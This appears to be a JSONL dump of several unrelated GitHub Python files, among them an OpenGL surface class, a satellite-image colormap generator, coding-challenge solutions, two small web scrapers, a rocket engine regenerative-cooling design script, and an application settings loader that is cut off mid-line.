(_GLpixel_YTextureOffset * float(_YTextureRatio) ) / float(_good_height)\n else:\n _good_width = self._GLheight * float(_aspect_ratio)\n _XAspectRatioOffset = (_XTextureRatio * abs(self._GLwidth)) / float(_good_width) - _XTextureRatio\n _GLpixel_XTextureOffset = (abs(self._GLwidth) - _good_width) / float(2)\n XTextureOffset -= (_GLpixel_XTextureOffset * float(_XTextureRatio) ) / float(_good_width)\n\n #FIXME : use lists\n if self._TextureOrder == 1:\n #Texture for normal coordinate system\r\n glBegin(GL_QUADS)\r\n glTexCoord2f(_XTextureRatio+XTextureOffset+_XAspectRatioOffset,YTextureOffset)\r\n glVertex3f(1.0, 0.0, 0.0)\r\n glTexCoord2f(XTextureOffset,YTextureOffset)\r\n glVertex3f(0.0, 0.0, 0.0)\r\n glTexCoord2f(XTextureOffset,_YTextureRatio+YTextureOffset+_YAspectRatioOffset)\r\n glVertex3f(0.0, 1.0, 0.0)\r\n glTexCoord2f(_XTextureRatio+XTextureOffset+_XAspectRatioOffset,_YTextureRatio+YTextureOffset+_YAspectRatioOffset)\r\n glVertex3f(1.0, 1.0, 0.0)\r glEnd()\n else:\n #Texture for Videos \n glBegin(GL_QUADS)\r\n glTexCoord2f(_XTextureRatio+XTextureOffset+_XAspectRatioOffset,YTextureOffset)\n glVertex3f(1.0, 1.0, 0.0)\r\n glTexCoord2f(XTextureOffset,YTextureOffset)\r\n glVertex3f(0.0, 1.0, 0.0)\r\n glTexCoord2f(XTextureOffset,_YTextureRatio+YTextureOffset+_YAspectRatioOffset)\r\n glVertex3f(0.0, 0.0, 0.0) \r\n glTexCoord2f(_XTextureRatio+XTextureOffset+_XAspectRatioOffset,_YTextureRatio+YTextureOffset+_YAspectRatioOffset)\r\n glVertex3f(1.0, 0.0, 0.0)\r glEnd() \n \n if self._texture != None :\n self._texture.unset_texture()\n \n glPopMatrix()\n \n def SetSize(self, Width, Height):\n zBaseClass.SurfaceBase.SetSize(self, Width, Height)\n if self._ApplyCoordinateTrans == True:\n if self._renderer==None:\n self._renderer = constants.GetForm()._GetRenderer()\n self._worldwidth, self._worldheight = self._renderer.GetWorldSize()\n self._GLwidth = Width * self._worldwidth / float(self._screenwidth)\n self._GLheight = Height * self._worldheight / float(self._screenheight)\n else:\n self._GLwidth = Width\n self._GLheight = Height\n \n def SetLocation(self, x, y, z):\n zBaseClass.SurfaceBase.SetLocation(self, x, y, z)\n self._GLposZ = z\n if self._ApplyCoordinateTrans == True:\n if self._renderer==None:\n self._renderer = constants.GetForm()._GetRenderer()\n self._worldwidth, self._worldheight = self._renderer.GetWorldSize()\n self._GLposX = (x*self._worldwidth / float(self._screenwidth)) - float(self._worldwidth/2)\n self._GLposY = float(self._worldheight/2) - (y*self._worldheight / float(self._screenheight)) \n else:\n self._GLposX = x\n self._GLposY = y\r\n \n def ApplyRotation(self, Rotate):\n assert isinstance(Rotate, Point3D) , \"Rotate has wrong type\"\r\n glRotatef(Rotate.x, 1.0, 0.0, 0.0)\r\n glRotatef(Rotate.y, 0.0, 1.0, 0.0)\r\n glRotatef(Rotate.z, 0.0, 0.0, 1.0)\r\n\n def GetTexture(self):\n return self._texture\n \n def SetTexture(self, texture):\n self._texture = texture\n","repo_name":"BackupTheBerlios/elisa-svn","sub_path":"trunk/extern/testGL/zAPI/zRenderer/zOpenGLSurface.py","file_name":"zOpenGLSurface.py","file_ext":"py","file_size_in_byte":7893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"1182543125","text":"\"\"\"Hackery.\"\"\"\nimport matplotlib.colors as mpcolors\n\n# Make colormap (based off of\n# http://cimss.ssec.wisc.edu/goes/visit/water_vapor_enhancement.html):\ncolors = [\n \"#000000\",\n \"#00FFFF\",\n \"#006C00\",\n \"#FFFFFF\",\n \"#0000A6\",\n \"#FFFF00\",\n \"#FF0000\",\n \"#000000\",\n \"#000000\",\n]\ncints = [-109.5, -109.0, -75.0, -47.0, -30.0, -15.5, 0.0, 0.5, 54.5]\ncints = [(float(c + 109.5) / float(54.5 + 109.5)) for c in cints]\ncolorList = []\nfor i in list(range(0, len(cints))):\n colorList.append((cints[i], colors[i]))\ncmap = mpcolors.LinearSegmentedColormap.from_list(\"mycmap\", colorList)\nfor i in range(256):\n val = -109.5 + (i / 255) * (54.5 + 109.5)\n c = cmap(i / 255.0)\n print(\"%.2f %.0f %.0f %.0f\" % (val, c[0] * 255, c[1] * 255, c[2] * 255))\n# vmax = 54.4\n# vmin = -109.\n","repo_name":"akrherz/pyWWA","sub_path":"goes/wv_cmap.py","file_name":"wv_cmap.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"2"} +{"seq_id":"10677121472","text":"from sys import stdin\r\n\r\n\r\ndef main():\r\n input = stdin.readline\r\n a, b, c, x, y = map(int, input().split())\r\n res1 = (2*c)*min(x, y) + a*(x-min(x, y)) + b*(y-min(x, y))\r\n res2 = a*x + b*y\r\n res3 = 2*c*max(x, y)\r\n\r\n print(min(res1, res2, res3))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"yu2799/AtCoder","sub_path":"abc/100/100/95C.py","file_name":"95C.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"37769130904","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def levelOrder(self, root: Optional[TreeNode]) -> List[List[int]]:\n \n if root is None:\n return []\n \n deque = []\n deque.append(root)\n value_list = [] # to be returned\n \n while deque:\n size_of_same_level = len(deque)\n values_of_same_level = []\n \n while size_of_same_level: # here is a good idea since we only iterate nodes of a certain level in each outer loop\n node = deque.pop(0)\n \n values_of_same_level.append(node.val)\n if node.left:\n deque.append(node.left)\n if node.right:\n deque.append(node.right)\n \n size_of_same_level -= 1\n \n value_list.append(values_of_same_level)\n \n return value_list\n","repo_name":"mershaywu77/leet_code","sub_path":"102/sol_1.py","file_name":"sol_1.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"30993739133","text":"import re\nfrom multiprocessing import Pool, Lock\nfrom Tools import get_html\n\n\ndef handle(asin):\n asin = asin.strip()\n try:\n baseurl = \"https://www.amazon.ca/dp/[asin]\"\n url = baseurl.replace('[asin]', asin)\n print (asin)\n html = get_html.get_html_src(url)\n robot_check = re.findall('Robot Check', html)\n if robot_check:\n lock.acquire()\n captcha_url_file.write(asin + '\\n')\n captcha_url_file.flush()\n lock.release()\n print (\"robot_check\")\n else:\n error404 = re.findall(\"We're sorry. The Web address you entered is not a functioning page on our site\", html)\n if error404:\n lock.acquire()\n not_list_file.write(asin + '\\n')\n not_list_file.flush()\n lock.release()\n print (\"not exit\")\n else:\n buyboxinfo = [asin]\n price = re.findall(r'New from CDN\\$ (.*?)\\n', html)[0]\n buyboxinfo.append(str(price))\n lock.acquire()\n result_file.write(\"\\t\".join(buyboxinfo) + \"\\n\")\n result_file.flush()\n success_asin_file.write(asin + '\\n')\n success_asin_file.flush()\n lock.release()\n print (\"success\")\n except Exception as e:\n print (str(e))\n lock.acquire()\n captcha_url_file.write(asin + '\\n')\n captcha_url_file.flush()\n lock.release()\n print (\"error: not html\")\n\n\ndef create_titles(filename, titles):\n f = open(filename, \"aw\")\n f.write(\"\\t\".join(titles) + \"\\n\")\n f.flush()\n f.close()\n\n\ndef get_fba_buybox(asinfile, fbainfofile):\n print (\"run start...\")\n global result_file # 结果文件\n global captcha_url_file # yan zheng ma ye mian\n global not_list_file # yi xia jia ye mian\n # global not_crawl_file # 抓取3次后失败,没有抓取到结果的页面\n global success_asin_file\n global lock, tool\n\n lock = Lock()\n captcha_url_file = open(\"./result/not_get\", \"aw\")\n not_list_file = open(\"./result/not_found.txt\", \"aw\")\n success_asin_file = open(\"./result/success_asin.txt\", \"aw\")\n\n titles = ['asin', 'price']\n\n create_titles(fbainfofile, titles)\n result_file = open(fbainfofile, \"aw\")\n\n file_asin = open(asinfile, 'r')\n asins = file_asin.readlines()\n\n pool = Pool(40)\n pool.map(handle, asins)\n pool.close()\n pool.join()\n\n file_asin.close()\n result_file.close()\n captcha_url_file.close()\n not_list_file.close()\n success_asin_file.close()\n\n print (\"run over\")\n\n\nif __name__ == '__main__':\n asinfile = './asins.txt'\n buyboxinfofile = './exit_ca111.csv'\n get_fba_buybox(asinfile, buyboxinfofile) # 抓取buybox数据","repo_name":"mylove1/LiuFan_Spider","sub_path":"Shopping_Web/Romance/ca.py","file_name":"ca.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7919441079","text":"import requests\r\nimport re\r\nimport os\r\nimport time\r\nimport datetime\r\nimport random\r\nimport openpyxl\r\nfrom openpyxl import load_workbook\r\n\r\n#必改数据\r\n#查询城市\r\nCity = \"beijing\"\r\n#查询开始&结束时间\r\ntimeBegin = \"20220814\"\r\ntimeEnd = \"20220815\"\r\n\r\n# URL常量\r\nwebsite = \"https://www.tianqi.com\"\r\nTemperature = '(-?[0-9]*?)~(-?[0-9]*?)°'\r\nUserAgent = {\r\n 'User-Agent':\r\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \\\r\n AppleWebKit/537.36 (KHTML, like Gecko) \\\r\n Chrome/99.0.4844.84 Safari/537.36'\r\n }\r\n\r\n#获取某个城市某天温度\r\ndef getTemp( city, date):\r\n s = requests.session()\r\n rs = s.get(website + \"/tianqi/\" + city + \"/\" + date + \".html\", headers=UserAgent)\r\n temp = re.search(Temperature, rs.text, re.S)\r\n return date,int(temp.group(1)),int(temp.group(2))\r\n\r\n# 主函数\r\nif __name__ == '__main__':\r\n\r\n i = 2\r\n\r\n #限定时间范围\r\n begin = datetime.date( \\\r\n int(timeBegin[0:4]), \\\r\n int(timeBegin[4:6]), \\\r\n int(timeBegin[6:8]))\r\n end = datetime.date( \\\r\n int(timeEnd[0:4]), \\\r\n int(timeEnd[4:6]), \\\r\n int(timeEnd[6:8]))\r\n delta = datetime.timedelta(days=1)\r\n\r\n #打开excel表格\r\n tempWb = openpyxl.Workbook()\r\n tempWs = tempWb.active\r\n \r\n #写入表头\r\n tempWs.cell(1, 1, value=\"date\")\r\n tempWs.cell(1, 2, value=\"min\")\r\n tempWs.cell(1, 3, value=\"max\")\r\n\r\n while begin <= end:\r\n nowdate = begin.strftime(\"%Y%m%d\")\r\n tp = getTemp( City, nowdate)\r\n tempWs.cell(i, 1, value=tp[0])\r\n tempWs.cell(i, 2, value=tp[1])\r\n tempWs.cell(i, 3, value=tp[2])\r\n begin += delta\r\n time.sleep(random.randint(5,20)/10)\r\n i += 1\r\n #debug\r\n print(tp)\r\n\r\n #保存表格文件\r\n tempWb.save(City + \"_\" + timeBegin + \"_\" +timeEnd + \".xlsx\")","repo_name":"yishunzhikong/getTemperature","sub_path":"getTemperature.py","file_name":"getTemperature.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33401598657","text":"\"\"\"How many words start with 'a' in a sentence?\"\"\"\n\n\ndef startA(str):\n str = str.split() # split string into a list\n count = 0\n for i in str:\n firstLetter = i[0]\n if firstLetter.lower() == 'a': # see if first letter is 'a'\n count += 1 # increment count\n return count\n\n\"\"\"Is a user entered value a number?\"\"\"\n\n\ndef isNum(userInput):\n return userInput.isalnum() # returns true if input is a number\nisNum(raw_input(\"Enter a number: \"))\n\n\"\"\"Can a computer do mad libs?\"\"\"\n\n\ndef madLibs():\n verb = raw_input(\"Enter a verb ending in ing: \")\n noun = raw_input(\"Enter a plural noun: \")\n adj = raw_input(\"Enter an adjective: \")\n print('\"There are too many %s %s on this %s plane!\" he screamed.' % (verb, noun, adj))\nmadLibs()\n","repo_name":"meslater1030/sea-c34-python","sub_path":"students/MeganSlater/session02/string.py","file_name":"string.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"29582815305","text":"a=input()\n# (()[[]])([])\nstack =[]\nans = 0\ntemp=1\nfor i in range(len(a)):\n if(a[i] == \"(\" ):\n stack.append(a[i])\n temp*=2\n elif(a[i] == \")\"):\n if( not stack or stack[-1]!=\"(\" ):\n ans=0\n break\n if(a[i-1]==\"(\"):\n ans+=temp\n\n temp//=2\n stack.pop()\n\n elif (a[i] == \"[\"):\n stack.append(a[i])\n temp*=3\n elif (a[i] == \"]\"):\n if (not stack or stack[-1] != \"[\"):\n ans = 0\n break\n if (a[i - 1] == \"[\"):\n ans += temp\n temp //= 3\n stack.pop()\n\nif stack:\n print(0)\nelse:\n print(ans)\n\n# 스택에서 pop할때에 원래 리스트랑 비교한후 tmp를 다시 2나3 으로 나눠주는 과정이 핵심","repo_name":"jeonbar2/Coding_Test","sub_path":"Boj/DataStructure/괄호의값.py","file_name":"괄호의값.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25268068836","text":"\"\"\"\n This script is the QuaKe package entry point. Parses the subcommands from\n command line and calls the appropriate function to run.\n\n Main help output:\n\n ```\n usage: quake [-h] {datagen,train} ...\n \n quake\n \n positional arguments:\n {datagen,train}\n datagen generate voxelized dataset from root files\n train train model\n \n optional arguments:\n -h, --help show this help message and exit\n \n ```\n\n\"\"\"\nimport logging\nimport argparse\nfrom time import time as tm\nfrom quake import PACKAGE\nfrom quake.dataset.generate import add_arguments_datagen\nfrom quake.models.train import add_arguments_train\n\nlogger = logging.getLogger(PACKAGE)\n\n\ndef main():\n \"\"\"Defines the QuaKe main entry point.\"\"\"\n parser = argparse.ArgumentParser(description=\"quake\")\n\n log_levels = [\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\"]\n parser.add_argument(\n \"-l\", default=None, help=\"set logging level\", choices=log_levels, dest=\"logging\"\n )\n\n subparsers = parser.add_subparsers()\n\n # preprocess dataset\n gen_msg = \"generate voxelized dataset from root files\"\n gen_subparser = subparsers.add_parser(\n \"datagen\", description=gen_msg, help=gen_msg.lower().split(\":\")[0]\n )\n add_arguments_datagen(gen_subparser)\n\n # train\n train_msg = \"train model\"\n train_subparser = subparsers.add_parser(\n \"train\", description=train_msg, help=train_msg.lower().split(\":\")[0]\n )\n add_arguments_train(train_subparser)\n\n args = parser.parse_args()\n\n # setting global logging level\n if args.logging:\n logger.warning(f\"Setting log level to {args.logging}\")\n logger.setLevel(args.logging)\n logger.handlers[0].setLevel(args.logging)\n\n # execute parsed function\n start = tm()\n args.func(args)\n logger.info(f\"Program done in {tm()-start} s\")\n","repo_name":"qismib/QuaKe","sub_path":"src/quake/scripts/quake.py","file_name":"quake.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"239517972","text":"\"\"\"\nEngine Design Code Top Level Script\n\nauthor: tcharlson\n\"\"\"\n\n# Public Modules\nfrom datetime import datetime\nstartTime = datetime.now()\nimport copy\nimport os\nimport numpy as np\nfrom scipy.optimize import fsolve\nfrom tqdm import tqdm\n\n# Custom Modules\nfrom geometry import chamber_geo, define_contour, plot_chamber_param\nfrom nozzle_thermo import chamber_thermo_calcs, t_adiabatic_wall, gnielinski_calc, plot_chamber_thermo, \\\n func_bartz_root_find, load_regen_geometry, soot_thermal_resistance\nfrom kerosene_props import get_jet_a_properties\nfrom engine_sizing_run import size_combustor, propellant\n\n\n### DEFINE TOP LEVEL PARAMETERS ###\nfuel = propellant(\"Kerosene\")\nox = propellant(\"LOX\")\n\n### PERFORMANCE PARAMS ###\nPc = 21.0 #bar\nPc_pa = Pc * 10**5 # chamber pressure in Pascals\nPe = 1.01325 #bar\nthrust = 3000 #newton\n# 2250 -> ~500lbf\n# 4500 -> ~1000 lbf\nMR = 1.7\neta_cstar = 0.9 # guess\npressure_ratio = Pe/Pc\nprint(f'pressure_ratio = {pressure_ratio}')\nprint(f'Pc/Pe = {Pc/Pe}')\n\nffc_pct = 0.15 # % FFC Mass fraction\n\n### GEOMETRIC PARAMS ###\nfac_CR = 7.0 #contraction ratio\nchamber_ha = 30.0 #degrees, chamber half angle\nnozzle_ha = 15.0 #degrees, nozzle half angle; conical nozzle\nL_star = 1.15 #meters - http://mae-nas.eng.usu.edu/MAE_5540_Web/propulsion_systems/section6/section.6.1.pdf guess for now\nnpts = 100 #number of points to define each contour section\nCHANNEL_CONFIG = 'regen_cfg.yaml' # config file name for regen parameters\n\n\nf_inj_stiff = 20.0 # percent\nP_f_inj = (1+(f_inj_stiff/100))*Pc\n\nBAR = True\nDEBUG = False\n\neng, T_c, T_t, R_specific, k, opt_expansion, v_e_ideal = size_combustor(Pc,MR,thrust,fac_CR,ox,fuel,pressure_ratio)\n\ncstar_ideal = np.sqrt(k*R_specific*T_c)/(k*np.sqrt((2/(k+1))**((k+1)/(k-1))))\ncstar_corr = eta_cstar*cstar_ideal\nprint(f'C*, ideal = {cstar_ideal} m/s - eta_C* = {eta_cstar}\\n'\n f'C*, corr = {cstar_corr} m/s')\n\nprint('\\n### COMBUSTOR MASS FLOWS ###')\nmdot_ideal_total = thrust/v_e_ideal\nprint(f'mdot_ideal_total = {mdot_ideal_total} kg/s\\n')\n\nmdot_ox_ideal = (MR/(1+MR))*mdot_ideal_total\nmdot_fuel_ideal = mdot_ideal_total - mdot_ox_ideal\nmdot_fuel_regen = mdot_fuel_ideal*(1+ffc_pct)\nprint(f'mdot_f (ideal) = {mdot_fuel_ideal} kg/s')\nprint(f'mdot_f (regen) = {mdot_fuel_regen} kg/s')\nprint(f'mdot_f_ffc = {mdot_fuel_ideal*ffc_pct} kg/s')\nprint(f'mdot_o (ideal) = {mdot_ox_ideal} kg/s')\n\nA_t = (mdot_ideal_total/(Pc*10**5))*np.sqrt((R_specific*T_c)/(k*((2/(k+1))**((k+1)/(k-1)))))\n#A_t_cm = A_t*(100**2)\nA_t_mm = A_t*(1000**2)\nR_t_mm = np.sqrt(A_t_mm/np.pi)\nD_t_mm = R_t_mm*2\nprint(f'A_throat = {A_t_mm} mm**2')\nprint(f'R_throat = {R_t_mm} mm, D_throat = {D_t_mm} - ({D_t_mm/25.4} in)\\n')\n\nA_c_mm = fac_CR*A_t_mm\nR_c_mm = np.sqrt(A_c_mm/np.pi)\nD_c_mm = R_c_mm*2\nprint(f'A_chamber = {A_c_mm} mm**2')\nprint(f'R_chamber = {R_c_mm} mm, D_chamber = {D_c_mm} - ({D_c_mm/25.4} in)\\n')\n\nA_e_mm = opt_expansion*A_t_mm\nR_e_mm = np.sqrt(A_e_mm/np.pi)\nD_e_mm = R_e_mm*2\nprint(f'A_exit = {A_e_mm} mm**2')\nprint(f'R_exit = {R_e_mm} mm, D_exit = {D_e_mm} - ({D_e_mm/25.4} in)\\n')\n\nprint(f\"Ideal CR (mae_5540) = 8.0/D_t**3/5 + 1.25 = {8.0/((D_t_mm/10)**(3/5))+1.25}\")\n\nprint(f'sanic {eng.combustor_obj.get_SonicVelocities(Pc=Pc,MR=MR,eps=opt_expansion)}')\n\nprint('\\n#### CALCULATING CHAMBER GEOMETRIC PROPERTIES ####')\nchamber_obj = chamber_geo(A_t_mm, R_t_mm, A_c_mm, R_c_mm, A_e_mm, R_e_mm)\nchamber_raw,i_t = define_contour(chamber_obj, L_star, nozzle_ha, chamber_ha, PLOT=False)\nchamber = copy.deepcopy(chamber_raw) # save raw copy of chamber data for export\nchamber_raw.to_csv(os.path.join(os.getcwd(), 'output', 'chamber_raw.csv'))\n\nprint('\\n#### RAW CHAMBER GEOMETRY EXPORTED ####')\n# seed heat transfer analysis\n# At the moment, am not super confident in the CEA output for transport props, does not seem to match CEA web unlike P/T props\n# Running case in CEA Web App and manually inputting the below\nmu = 0.91*0.0001 # millipoise -> Pa.s\nCp = 3.25*10**3 # J/kg.K (need to convert)\nPr = 0.50 # avg from CEA output with lower bias\n#mod with eta cstar\nRC_throat = 0.015 # radius of curvature at throat - spoof 15mm for now\n\ncond_w = 350 # copper, W/m.K - conservatively low bound\nC = 0.026 # Bartz constant\n\n# compute 4x bartz constants which do not vary over nozzle\nb1 = (C/((D_t_mm/1000)**0.2)) # first constant in bartz correlation C/Dt**0.2 - diameter correlation\nb2 = ((mu**0.2)*Cp)/(Pr**0.6) # 2nd constant - mu**0.2.Cp/Pr**0.6 - transport props\nb3 = (Pc_pa/(cstar_ideal))**0.8 # 3rd constant - Pc correlation - use ideal C* to be conservative\nb4 = ((D_t_mm/1000)/RC_throat)**0.1 # 4th constant - throat curvature correction\nbartz_mult = b1*b2*b3*b4\n\nchamber = chamber_thermo_calcs(chamber, k, R_specific, T_c, Pc) # populate flow props vs station - isentropic\nchamber = load_regen_geometry(chamber, CHANNEL_CONFIG)\n\nchamber['A_chan'] = chamber['w_chan'] * chamber['d_chan'] # mm**2\nchamber['D_hyd'] = 2*chamber['A_chan']/(chamber['w_chan'] + chamber['d_chan']) # mm\nchamber['mdot_chan'] = mdot_fuel_regen/chamber['n_chan']\n\nT_eth_0 = 300 # K - assume roomish temp 70F\ni_n = len(chamber.index) - 1 # grab i of nth index\n# seed coolant temp params, and then set starting coolant temp\nfor parm in ['T_c_i','dT_c','T_c_e','P_c_i','dP_c','P_c_e']:\n chamber[parm] = np.zeros(len(chamber.index))\nchamber.at[i_n,'T_c_i'] = T_eth_0\n\nT_wg_guess = 700\nT_wc_guess = T_wg_guess - 100\nq_guess = 1.0E06\nHT_SOLVE_GUESS = [T_wg_guess, T_wc_guess, q_guess]\n\n### Do heat transfer ###\nfor i in tqdm(range(len(chamber.index))[::-1]):\n # NOTE: iterate thru in reverse\n if i > 0:\n # stop at 0th pt, will march upstream & use i-1th pt for area dx calc\n\n #grab transpo props for Bartz\n M = chamber.at[i,'mach']\n eps = chamber.at[i,'eps']\n AR_factor = (1 / eps) ** 0.9\n\n # Calculate HT geometry\n chamber.at[i,'dx'] = chamber.at[i,'x'] - chamber.at[i-1,'x'] # mm\n # Slant Area: https://www.calculatorsoup.com/calculators/geometry-solids/conicalfrustum.php\n # S = π * (r1 + r2) * s = π * (r1 + r2) * √((r1 - r2)2 + h2)\n chamber.at[i,'s'] = np.sqrt(((chamber.at[i,'r']-chamber.at[i-1,'r'])**2)+chamber.at[i,'dx']**2) # mm - slant height/linear dist travelled\n chamber.at[i, 'A_w_segment'] = np.pi * (chamber.at[i,'r']+chamber.at[i - 1,'r']) * chamber.at[i,'s'] # mm**2\n # Calc Adiabatic Wall Temp\n chamber.at[i,'T_aw'] = t_adiabatic_wall(T_c,Pr,M,k)\n chamber.at[i,'R_soot'] = soot_thermal_resistance(chamber.at[i,'eps'],chamber.at[i,'regime']) # (m**2 K)/W - Huzel & Huang\n\n #Get coolant inlet properties:\n rho_c, cp_c, cond_c, visc_c = get_jet_a_properties(chamber.at[i,'T_c_i'])\n chamber.at[i,'rho_c'] = rho_c\n chamber.at[i,'cp_c'] = cp_c\n chamber.at[i,'cond_c'] = cond_c\n chamber.at[i,'visc_c'] = visc_c\n chamber.at[i,'u_c'] = chamber.at[i,'mdot_chan']/(chamber.at[i,'rho_c']*(chamber.at[i,'A_chan']/(1000**2))) # Coolant Velo - m/s\n chamber.at[i,'t_transit'] = chamber.at[i,'s']/(chamber.at[i,'u_c']*1000)\n chamber.at[i,'Re_c'] = (chamber.at[i,'rho_c']*(chamber.at[i,'D_hyd']/1000)*chamber.at[i,'u_c'])/chamber.at[i,'visc_c'] # Coolant Re; convert D_hyd to m\n chamber.at[i,'Pr_c'] = (chamber.at[i,'cp_c']*chamber.at[i,'visc_c'])/chamber.at[i,'cond_c']\n chamber.at[i,'f_darcy'] = (0.79*np.log(chamber.at[i,'Re_c']) - 1.64)**(-2) # Petukhov correlation; Incorpera pg.490\n chamber.at[i,'Nu_c'] = gnielinski_calc(chamber.at[i,'f_darcy'], chamber.at[i,'Re_c'], chamber.at[i,'Pr_c'])\n chamber.at[i,'h_c'] = chamber.at[i, 'Nu_c'] * chamber.at[i, 'cond_c'] / (chamber.at[i, 'D_hyd']/1000) # Coolant h_c; convert D_hyd to mm\n\n # Run 1D heat transfer solver using Numpy Root Find\n T_c_MOD = 1.0\n data = (chamber.at[i,'t_wall']/1000,\n cond_w,\n bartz_mult*AR_factor,\n T_c/T_c_MOD,\n chamber.at[i, 'T_c_i'],\n chamber.at[i, 'h_c'],\n chamber.at[i, 'T_aw'],\n M,\n k,\n chamber.at[i, 'R_soot']) #create args for solver\n\n qmod = 1.0\n root = fsolve(func_bartz_root_find,HT_SOLVE_GUESS,args=data)\n chamber.at[i, 'T_wg'] = root[0]\n chamber.at[i, 'T_wc'] = root[1]\n chamber.at[i, 'q_tot'] = root[2]/qmod\n chamber.at[i, 'dT_c'] = (chamber.at[i,'q_tot']*chamber.at[i,'A_w_segment']/(1000.0**2))/(mdot_fuel_ideal*chamber.at[i,'cp_c'])\n chamber.at[i, 'T_c_e'] = chamber.at[i, 'T_c_i'] + chamber.at[i, 'dT_c']\n chamber.at[i - 1, 'T_c_i'] = chamber.at[i, 'T_c_e']\n # calculate darcy-weisbach pressure drop\n # https://en.wikipedia.org/wiki/Darcy%E2%80%93Weisbach_equation\n chamber.at[i, 'dP_c'] = (chamber.at[i,'s']/1000 * (chamber.at[i,'f_darcy']*(chamber.at[i,'rho_c']/2)*((chamber.at[i,'u_c']**2)/(chamber.at[i,'D_hyd']/1000))))/10**5 # dP in Bar\n\n if DEBUG:\n print(root)\n\n else:\n # populate final station with non-NAN values\n # i = 0\n keys = [key for key in chamber.keys() if key not in ['x', 'r', 'theta', 'eps', 'regime']]\n for key in keys:\n chamber.at[0, key] = chamber.at[1, key]\n\n# Invert Coolant Pressure Vectors to match flow direction\nchamber.at[0,'P_c_e'] = P_f_inj\nfor i in range(len(chamber.index)-1):\n chamber.at[i,'P_c_i'] = chamber.at[i,'P_c_e'] + chamber.at[i,'dP_c']\n chamber.at[i+1,'P_c_e'] = chamber.at[i,'P_c_i']\n\n# Plot thermo outputs\nfig = plot_chamber_thermo(chamber,eng)\nfig.tight_layout()\nfig.show()\n\nchamber_OD_w_cooling = np.round(np.max(chamber[\"r_outer\"]),2)*2\n\n# Console Output\nprint(f'Chamber OD w/Cooling = {chamber_OD_w_cooling} [mm] ({chamber_OD_w_cooling/25.4} [in])\\n')\nprint(f'Regen Inlet Pressure = {chamber.at[i_n,\"P_c_e\"]} [BarA]')\nprint(f'Injector Inlet Pressure = {chamber.at[0,\"P_c_e\"]} [BarA]\\n')\nprint(f'Regen Stiffness = {100*(chamber.at[i_n,\"P_c_e\"] - chamber.at[0,\"P_c_e\"])/chamber.at[0,\"P_c_e\"]} [%]\\n')\nprint(f'Injector Inlet Fuel Props:')\nprint(f'T_c = {chamber.at[0,\"T_c_e\"]} [K]')\nprint(f'rho_c = {chamber.at[0,\"rho_c\"]} [kg/s]')\nprint(f'visc_c = {chamber.at[0,\"visc_c\"]} [Pa.s]')\n\n# Save final chamber output case\nchamber.to_csv(os.path.join(os.getcwd(),'output','chamber_final.csv'))\n\n# Time Benchmark\nprint(f'\\nScript Runtime: {datetime.now() - startTime} [s]')\n\n\n\n","repo_name":"trenton-charlson/engine-dev","sub_path":"engine_design_code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10355,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"11836194052","text":"import json\nimport os\nfrom pathlib import Path\nfrom typing import Union, Any\n\nfrom modules.app_globals import Resource, UI_PATH, UI_PATHS_FILE, SETTINGS_FILE\nfrom modules.app_globals import get_settings_dir\nfrom modules.detect_language import setup_translation\n\n\ndef delayed_log_setup():\n from modules.log import init_logging\n global LOGGER\n LOGGER = init_logging(__name__)\n\n\nclass Settings:\n \"\"\"\n Load and save methods to save class attributes of setting classes\n \"\"\"\n @staticmethod\n def load(obj: object, file):\n try:\n with open(file, 'r') as f:\n load_dict = json.load(f, encoding='utf-8')\n except Exception as e:\n print('Could not load setting data:\\n', e)\n return\n\n for key, attr in load_dict.items():\n setattr(obj, key, attr)\n\n @staticmethod\n def save(obj: object, file: Union[Path, str]):\n save_dict = dict()\n\n for key, value in obj.__dict__.items():\n if key.startswith('__'):\n # Skip internal attributes\n continue\n\n if not Settings.is_serializable(value):\n # Skip non-serializable data\n continue\n\n LOGGER.debug('Saving %s: %s', key, value)\n save_dict.update({key: value})\n\n try:\n with open(file, 'w') as f:\n json.dump(save_dict, f, indent='\\t')\n\n LOGGER.info('Saved settings to file: %s', file.absolute().as_posix())\n except Exception as e:\n LOGGER.error('Could not save file!\\n%s', e)\n\n @staticmethod\n def is_serializable(data: Any) -> bool:\n try:\n json.dumps(data)\n return True\n except Exception as e:\n LOGGER.debug(e)\n\n return False\n\n\nclass AppSettings:\n \"\"\"\n Store and Re-store application settings\n\n Settings are stored inside this class as class attributes(not instanced)\n \"\"\"\n # --- Default values ----\n app = dict(\n version='0.0.0',\n current_path='',\n introduction_shown=False,\n recent_files=list(),\n open_editor=False,\n editor_path='.',\n psd_size=(1920, 1080),\n window=(0, 0, 0, 0),\n resampling_filter='Bicubic'\n )\n\n language = 'de'\n\n log_queue = None\n\n @classmethod\n def load(cls) -> None:\n file = Path(cls.get_settings_path())\n\n if not file or not file.exists():\n print('Could not locate settings file! Using default settings!')\n return\n\n default_settings = dict()\n default_settings.update(cls.app)\n\n Settings.load(AppSettings, 